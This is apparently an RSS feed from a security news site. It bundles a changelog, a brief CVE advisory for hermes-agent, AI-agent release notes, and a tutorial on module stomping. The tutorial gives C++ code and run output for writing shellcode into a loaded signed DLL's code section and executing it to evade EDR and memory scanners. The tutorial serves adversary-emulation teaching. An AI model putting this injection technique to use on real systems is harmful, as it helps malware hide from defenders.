<li>fix(keybindings): default Ctrl+Q for follow-up so Windows Terminal works by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4594461651" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1905" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1905/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1905">#1905</a></li>
<li>fix(eval): stop detaching the Python kernel's console on Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601143511" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1961" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1961/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1961">#1961</a></li>
<li>fix(tui): avoid dirty scrollback replay on arrow input by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601399075" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1963" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1963/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1963">#1963</a></li>
<li>fix(ai): preserve llama.cpp parallel tool arguments by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601897032" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1971" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1971/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1971">#1971</a></li>
<li>fix(tui): honor resume clear replay before initial paint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601998309" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1973" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1973/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1973">#1973</a></li>
<li>fix(tui): commit tmux pane history during streaming via pinned emit by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602156805" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1975" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1975/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1975">#1975</a></li>
<li>fix(lsp): support rust-analyzer workspace loading by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602239510" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1977" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1977/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1977">#1977</a></li>
<li>test(tui): widened slash autocomplete settle slack past debounce jitter by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4602571001" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1981" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1981/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1981">#1981</a></li>
<li>fix(coding-agent): guard task renderer against non-array yield slot by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4603076420" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1989" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1989/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1989">#1989</a></li>
<li>fix(coding-agent): honor ttsr.enabled: false in TtsrManager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/QianYan-Art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/QianYan-Art">@QianYan-Art</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4603070748" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1988" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1988/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1988">#1988</a></li>
<li>fix(coding-agent): allow retry without model fallback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/metaphorics/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/metaphorics">@metaphorics</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596258504" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1929" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1929/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1929">#1929</a></li>
<li>Add ScrollView component by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/enieuwy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/enieuwy">@enieuwy</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4601721650" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1969" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1969/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1969">#1969</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/QianYan-Art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/QianYan-Art">@QianYan-Art</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4603070748" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1988" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1988/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1988">#1988</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v15.9.5...v15.9.67"><tt>v15.9.5...v15.9.67</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11461 | NousResearch hermes-agent up to 0.12.0 resume Endpoint hermes_state.py resolve_session_by_title Title authorization (EUVD-2026-34992)]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in NousResearch hermes-agent up to 0.12.0. This affects the function resolve_session_by_title of the file hermes_state.py of the component resume Endpoint. Such manipulation of the argument Title leads to authorization bypass.

This vulner...]]></description>
<link>https://tsecurity.de/de/3580161/sicherheitsluecken/cve-2026-11461-nousresearch-hermes-agent-up-to-0120-resume-endpoint-hermesstatepy-resolvesessionbytitle-title-authorization-euvd-2026-34992/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580161/sicherheitsluecken/cve-2026-11461-nousresearch-hermes-agent-up-to-0120-resume-endpoint-hermesstatepy-resolvesessionbytitle-title-authorization-euvd-2026-34992/</guid>
<pubDate>Mon, 08 Jun 2026 01:36:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/nousresearch:hermes-agent">NousResearch hermes-agent up to 0.12.0</a>. This affects the function <code>resolve_session_by_title</code> of the file <em>hermes_state.py</em> of the component <em>resume Endpoint</em>. Such manipulation of the argument <em>Title</em> leads to authorization bypass.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-11461">CVE-2026-11461</a>. It is possible to launch the attack remotely. Furthermore, an exploit is available.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[An Introduction to Module Stomping]]></title>
<description><![CDATA[Overwriting DLLs for Windows Process InjectionBackgroundContextIn modern adversary emulation, generic process-injection techniques are closely scrutinized. Legacy approaches like cross-process thread creation with unbacked memory regions trigger immediate behavioral telemetry and get instantly po...]]></description>
<link>https://tsecurity.de/de/3579536/hacking/an-introduction-to-module-stomping/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579536/hacking/an-introduction-to-module-stomping/</guid>
<pubDate>Sun, 07 Jun 2026 16:53:54 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h4>Overwriting DLLs for Windows Process Injection</h4><h3>Background</h3><h4>Context</h4><p>In modern adversary emulation, generic process-injection techniques are closely scrutinized. Legacy approaches like cross-process thread creation with unbacked memory regions trigger immediate behavioral telemetry and get instantly popped by memory scanners.</p><p>To bypass these hurdles, we need to <em>slide</em> past detection. Enter <strong>Module Stomping,</strong> a technique that involves overwriting the .text section of a loaded, signed DLL to hide our payload inside a disk-backed memory region.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1000/1*U8UJ8_acKRS5lhXe38CWeg.png"><figcaption>CHA CHA NOW YA’LL</figcaption></figure><p>In this post, I will outline the basic workflow and some common primitives used in <strong>module stomping for Windows process injection</strong>.</p><h4>Tools</h4><p>All module stomping code referenced in this post can be found in the ‘module-injection’ folder in my ‘windows-process-injection’ repository.</p><p><a href="https://github.com/toneillcodes/windows-process-injection">GitHub - toneillcodes/windows-process-injection: A collection of techniques for process injection on Windows</a></p><p><strong>SystemInformer</strong> can optionally be used to follow the workflow and will be covered in the example PoC section of this post.</p><p><a href="https://systeminformer.sourceforge.io/">System Informer</a></p><h3>Module Stomping</h3><h4>Workflow &amp; Primitives</h4><p>The following is an outline of a common module stomping workflow.</p><ul><li><strong>Step One</strong>: Identify a <strong>target module</strong> or use LoadLibraryExA to load a ‘sacrificial’ module to serve as the <strong>stomping target</strong>.</li><li><strong>Step Two:</strong> Identify an <strong>address</strong> within the target module’s address space to <strong>write </strong>our <strong>buffer</strong> (typically by locating a specific exported function via GetProcAddress).</li><li><strong>Step Three:</strong> <strong>Write </strong>our<strong> buffer</strong> to the <strong>address </strong>from Step Two with WriteProcessMemory<strong>.</strong></li><li><strong>Step Four:</strong> Create a <strong>new thread</strong> using the <strong>buffer address </strong>from Step Two with CreateThread.</li></ul><p>While this foundational workflow is completely functional, a stock implementation like this leaves a massive trail of Indicators of Compromise (IoCs). In the sections below, we’ll analyze how this basic approach trips modern defenses, and how we can modify the code to obscure both static and dynamic signatures.</p><h3>Proof-of-Concept</h3><h4>Local Stomping</h4><p>The cleanest way to map out this tradecraft is by executing it within our current process context. This keeps our debugging loop simple and focuses purely on the memory manipulation itself. Let’s break down the core logic using the <a href="https://github.com/toneillcodes/windows-process-injection/blob/main/module-stomping/local-stomp.cpp">local-stomp.cpp</a> source file from the ‘<a href="https://github.com/toneillcodes/windows-process-injection">Windows Process Injection</a>’ repository.</p><p>First, we need to open a handle to the current process using OpenProcess.</p><pre>// Open a handle to the current process<br>HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(pid));<br>if(pHandle == NULL) {<br>    printf("Failed to acquire process handle!\n");<br>    return -1;<br>}<br>printf("[*] Successfully opened handle to PID: %u\n", pid);</pre><p>Now that we have a handle, we need to either locate or load the target module.</p><p>For this demonstration, we’ll load wininet.dll; it’s fairly large and so it can accommodate testing different payloads. Using LoadLibraryExA is not always a good idea, but it is helpful for demonstrating the concept.</p><pre>// load sacrificial DLL, using wininet because it is fairly large and so it can accomodate different PoC payloads<br>HMODULE hSacrificialDll = LoadLibraryExA("wininet.dll", NULL, DONT_RESOLVE_DLL_REFERENCES);<br>if (hSacrificialDll == NULL) {<br>    printf("[ERROR] Failed to obtain DLL handle! Error: %lu\n", GetLastError());<br>    return -1;<br>}<br>printf("[*] Target DDL loaded.\n");</pre><p>We need to identify the .text section of the module. We can either locate the section itself or search the module for a specific function.</p><p>For the sake of demonstration, we will leverage the GetProcAddresss function. We pass a handle to the module and the function name we want to locate, and it will return the address.</p><pre>LPVOID targetAddress = (LPVOID)GetProcAddress(hSacrificialDll, "CommitUrlCacheEntryW");  <br>if (targetAddress == NULL) {<br>    printf("[ERROR] Failed to locate target function CommitUrlCacheEntryW! Error: %lu\n", GetLastError());<br>    return -1;<br>}<br>printf("[*] Target wininet.dll!CommitUrlCacheEntryW located at: : 0x%016llx\n", targetAddress);</pre><p>Now that we have a target address, we can overwrite module code with our own buffer by using targetAddress as the destination parameter for WriteProcessMemory.</p><pre>// Write the shellcode to the block of memory that we allocated with VirtualAllocEx<br>BOOL writeShellcode = WriteProcessMemory(pHandle, targetAddress, buf, sizeof buf, NULL);<br>if(writeShellcode == false) {<br>    printf("[ERROR] Failed to write shellcode! Using addresss: 0x%016llx, Error: %lu\n", targetAddress, GetLastError());<br>    FreeLibrary(hSacrificialDll);<br>    return -1;<br>}</pre><p>Finally, execute our buffer by creating a new thread, using the targetAddress value as the lpStartAddress parameter for CreateThread.</p><pre>// Create a new thread using the shellcode buffer address as the starting point<br>HANDLE tHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)targetAddress, NULL, 0, NULL);<br>if (tHandle == NULL) {<br>    printf("[ERROR] Failed to create thread within the process (PID: %u)! Error: %lu\n", pid, GetLastError());<br>    FreeLibrary(hSacrificialDll);<br>    return -1;<br>}</pre><h4>Compile</h4><p>Compile the local-stomp.cpp example code and suppress warnings.</p><pre>windows-process-injection\module-stomping&gt;cl.exe local-stomp.cpp /W0<br>Microsoft (R) C/C++ Optimizing Compiler Version 19.16.27054 for x64<br>Copyright (C) Microsoft Corporation.  All rights reserved.<br><br>local-stomp.cpp<br>Microsoft (R) Incremental Linker Version 14.16.27054.0<br>Copyright (C) Microsoft Corporation.  All rights reserved.<br><br>/out:local-stomp.exe<br>local-stomp.obj<br><br>windows-process-injection\module-stomping&gt;</pre><h4>Execute &amp; Validate</h4><p>The PoC includes pauses to help track the workflow. In this example, we will use SystemInformer (previously ProcessHacker) to illustrate the process.</p><ul><li>Run local-stomp.exe and pause at the first prompt to openSystemInformer and locate the process using the PID from the output.</li></ul><pre>windows-process-injection\module-stomping&gt;local-stomp.exe<br>[*] Running PI with target PID: 1100<br>[*] Successfully opened handle to PID: 1100<br>[*] Press Enter to load the sacrificial DLL: &lt;Enter&gt;</pre><ul><li>Double-click on the process from the list and, in the process Properties panel, open the ‘Modules’ tab. Note that at this point, only kernel32.dll and ntdll.dll have been loaded.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/803/1*3eEGhC1xWr1UavK-5qdOmQ.png"><figcaption>Baseline modules for our simple executable.</figcaption></figure><ul><li>Back at the console, press Enter to resume the process and load the sacrificial DLL wininet.dll and locate the CommitUrlCacheEntryW function.</li></ul><pre>windows-process-injection\module-stomping&gt;local-stomp.exe<br>[*] Running PI with target PID: 1100<br>[*] Successfully opened handle to PID: 1100<br>[*] Press Enter to load the sacrificial DLL: &lt;Enter&gt;<br>[*] Target DLL loaded.<br>[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30<br>[*] Press Enter to write the shellcode:</pre><ul><li>In the console output, note the function’s address:0x00007ff917297f30. Back in SystemInformer, review the ‘Modules’ list. It should contain a new entry for wininet.dll.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/569/1*Uhmm5xWDW6I6UBbMVgGJdw.png"><figcaption>Refreshed module list shows the wininet.dll module</figcaption></figure><ul><li>Switch to the ‘Memory’ tab in SystemInformer and sort by ‘Base Address’. Locate the .text section of the target module by looking for the section that contains the function address (hint: it should have a ‘Use’ value of ‘C:\Windows\System32\wininet.dll’ with RXprotection).</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/886/1*nHU_Breu5s4Tsw_Olc1_TQ.png"><figcaption>Locating the .text section of wininet.dll based on properties</figcaption></figure><ul><li>Right-click and copy the ‘Base Address’ of this section. In this case, the address was 0x7ff917221000</li><li>Subtract the function address from the section base to obtain the offset 0x00007ff917297f30 - 0x00007ff917221000 = 0x76F30</li><li>Double-click the Memory entry to view the contents. When the window loads, click the ‘Go to…’ button and enter the offset found when subtracting the function from the module base RVA. (0x76F30). The code has not been tampered with and contains legitimate wininet.dll code.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/672/1*g_qbDlvL5Fy8eT9ILWU5uA.png"><figcaption>Baseline module code that has not been tampered with</figcaption></figure><ul><li>Back at the console, press ‘Enter’ to write the shellcode to the target address</li></ul><pre>...<br>[*] Target wininet.dll!CommitUrlCacheEntryW located at: 0x00007ff917297f30<br>[*] Press Enter to write the shellcode: &lt;Enter&gt;</pre><ul><li>Back in SystemInformer, in the ‘Memory’ tab, click the ‘Re-read’ button to refresh the memory at the target address. It should now reflect the bytes from our buffer.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/679/1*GKuMMgC04Abr8wY-3O008A.png"><figcaption>Updated memory shows our payload bytes and the calc.exe string</figcaption></figure><ul><li>Press ‘Enter’ one last time and confirm that the payload executes. Unless replaced, the shellcode is the Win32 calculator payload from Metasploit’s msfvenom.</li></ul><pre>...<br>[*] Press Enter to write the shellcode: &lt;Enter&gt;<br>[*] Press Enter to execute the shellcode: &lt;Enter&gt;<br>[*] Waiting for the thread to return...<br>[*] Process injection complete.<br><br>windows-process-injection\module-stomping&gt;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GhhEn6_WRWzzCJoK6mTPTw.png"><figcaption>Full execution resulting in a…calculator!</figcaption></figure><h3>Conclusion</h3><h4>Summary</h4><ul><li>Module stomping successfully circumvents traditional allocation traps by hiding payloads directly within the .text section of legitimate DLLs.</li><li>Module stomping is a valuable tool for Windows process injection.</li><li>While highly functional as a baseline injection primitive, a vanilla implementation introduces secondary Indicators of Compromise (IoCs) via static imports and API strings.</li><li>Modern EDR platforms and memory scanners don’t just look for unbacked memory; they actively perform verification checks to spot when a loaded module’s in-memory bytes deviate from its on-disk image.</li></ul><h3>Next Steps</h3><h4>Enhancements</h4><p>While this foundational implementation gets our code running under the guise of a legitimate DLL, it leaves obvious footprints. In the next post, we will look at moving beyond basic local execution to explore:</p><ul><li><strong>Remote Module Stomping:</strong> Orchestrating this dance inside a remote target process.</li><li><strong>Dynamic Function Resolution:</strong> Using PEB-walking techniques to reduce static IoCs and avoid highly scrutinized APIs.</li><li><strong>Targeted Stomping Workflow:</strong> Custom tooling to support a workflow for identifying the best target for module stomping operations.</li></ul><h3>References</h3><ul><li>“Module Stomping: Who up stompin they modules” by Dylan Tran<br><a href="https://dtsec.us/2023-11-04-ModuleStompin/">https://dtsec.us/2023-11-04-ModuleStompin/</a></li><li>SystemInformer by Winsider Seminars &amp; Solutions, Inc.<br><a href="https://systeminformer.sourceforge.io/">https://systeminformer.sourceforge.io/</a></li><li>MSDN: OpenProcess<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess</a></li><li>MSDN: LoadLibraryExA<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa">https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryexa</a></li><li>MSDN: GetProcAddress<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress">https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress</a></li><li>MSDN: CreateThread<br><a href="https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread">https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread</a></li></ul><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=26238af76d43" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/an-introduction-to-module-stomping-26238af76d43">An Introduction to Module Stomping</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best 21 Low-Code and No-Code AI Tools in 2026]]></title>
<description><![CDATA[Low-code and no-code AI platforms now turn a prompt into a working app, agent, or model. This guide compares 21 tools across app builders, automation, AI agents, and machine learning platforms, each linked to its official site.
The post Best 21 Low-Code and No-Code AI Tools in 2026 appeared first...]]></description>
<link>https://tsecurity.de/de/3579065/ai-nachrichten/best-21-low-code-and-no-code-ai-tools-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3579065/ai-nachrichten/best-21-low-code-and-no-code-ai-tools-in-2026/</guid>
<pubDate>Sun, 07 Jun 2026 10:48:31 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Low-code and no-code AI platforms now turn a prompt into a working app, agent, or model. This guide compares 21 tools across app builders, automation, AI agents, and machine learning platforms, each linked to its official site.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/07/best-21-low-code-and-no-code-ai-tools-in-2026/">Best 21 Low-Code and No-Code AI Tools in 2026</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hermes Agent v0.16.0 (2026.6.5) — The Surface Release]]></title>
<description><![CDATA[Hermes Agent v0.16.0 (v2026.6.5)
Release Date: June 5, 2026
Since v0.15.2: 874 commits · 542 merged PRs · 1,962 files changed · 205,216 insertions · 46,217 deletions · 399 issues closed (2 P0, 62 P1, 16 security-tagged) · 170 community contributors (including co-authors)

The Surface Release. Her...]]></description>
<link>https://tsecurity.de/de/3576866/downloads/hermes-agent-v0160-202665-the-surface-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576866/downloads/hermes-agent-v0160-202665-the-surface-release/</guid>
<pubDate>Sat, 06 Jun 2026 03:01:15 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Hermes Agent v0.16.0 (v2026.6.5)</h1>
<p><strong>Release Date:</strong> June 5, 2026<br>
<strong>Since v0.15.2:</strong> 874 commits · 542 merged PRs · 1,962 files changed · 205,216 insertions · 46,217 deletions · 399 issues closed (2 P0, 62 P1, 16 security-tagged) · 170 community contributors (including co-authors)</p>
<blockquote>
<p><strong>The Surface Release.</strong> Hermes meets you wherever you work. A brand-new native desktop app — built across 100 PRs and 159 commits in a single week — gives you Hermes as a real macOS/Linux/Windows application: one-click install, in-app self-update, drag-and-drop files into chat, an inline model picker in the status bar, concurrent multi-profile sessions, a full Simplified Chinese translation, and the ability to connect to a remote Hermes gateway over OAuth or username/password. Alongside it, the web dashboard grew a full browser-based administration panel (MCP catalog, messaging channels, credentials, webhooks, memory, pluggable OIDC / username-password login), and first-time setup got a "Quick Setup via Nous Portal" path that gets you from install to first message in seconds. The default skill set was trimmed to what you actually need, NVIDIA/skills joined the trusted Skills Hub taps, the model picker is now fuzzy-searchable everywhere (desktop, web, TUI, CLI), and <code>/undo</code> finally lets you take back the last N turns. 2 P0 and 62 P1 closures ride along, plus a security round (CVE-2026-48710 Starlette pin, SSRF off-loop hardening, subprocess credential stripping).</p>
</blockquote>
<hr>
<h2>✨ Highlights</h2>
<ul>
<li>
<p><strong>Hermes Desktop — a real native app, not a terminal wrapper</strong> — This is the headline. There's now a <code>apps/desktop/</code> Electron application that installs like any other desktop app on macOS, Linux, and Windows, updates itself in place from inside the app, and gives you a polished GUI for everything Hermes does. You get a proper chat window with streaming, a session list you can archive and search, drag-and-drop files anywhere in the chat area, clipboard image paste, a Cmd+K command palette, and a model picker right in the status bar. If you've been telling friends "it's a CLI agent" and watching their eyes glaze over — now you can just send them an installer. None of this existed a week ago. (<a href="https://github.com/NousResearch/hermes-agent/pull/20059" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20059/hovercard">#20059</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/35607" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/35607/hovercard">#35607</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37099" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37099/hovercard">#37099</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37379" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37379/hovercard">#37379</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38631" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38631/hovercard">#38631</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jquesnelle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jquesnelle">@jquesnelle</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ethernet8023/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ethernet8023">@ethernet8023</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</p>
</li>
<li>
<p><strong>Run the desktop app against a remote Hermes — sign in with OAuth or username/password</strong> — The desktop app doesn't have to run Hermes locally. Point it at a remote Hermes gateway (your homelab, a hosted box, a teammate's server) and it connects over a secure WebSocket, authenticating with OAuth or a username/password login — no fiddling with <code>--insecure</code> flags or hand-copied session tokens. Each profile can target its own remote host, and you can run concurrent sessions across multiple profiles in one window with cross-profile <code>@session</code> links. The practical version: your laptop runs a thin GUI, the heavy agent runs wherever your API keys and compute live. (<a href="https://github.com/NousResearch/hermes-agent/pull/37888" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/37888/hovercard">#37888</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/38851" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38851/hovercard">#38851</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39330" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39330/hovercard">#39330</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/39778" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/39778/hovercard">#39778</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</p>
</li>
<li>
<p><strong>The web dashboard is now a full admin panel — configure everything from the browser</strong> — The dashboard grew from "view your sessions" into a complete administration surface. There's a Channels page that sets up every gateway messaging platform (Telegram, Discord, Slack, etc.) from the browser, an admin panel for the MCP catalog with enable/disable toggles, credential management, webhook and hook creation, memory configuration, gateway controls, and a System page with check-before-update and one-click Debug Share. You no longer have to SSH in and edit <code>config.yaml</code> to wire up a new messaging channel or MCP server — it's all point-and-click now. (<a href="https://github.com/NousResearch/hermes-agent/pull/36704" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36704/hovercard">#36704</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/36736" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/36736/hovercard">#36736</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/37211" 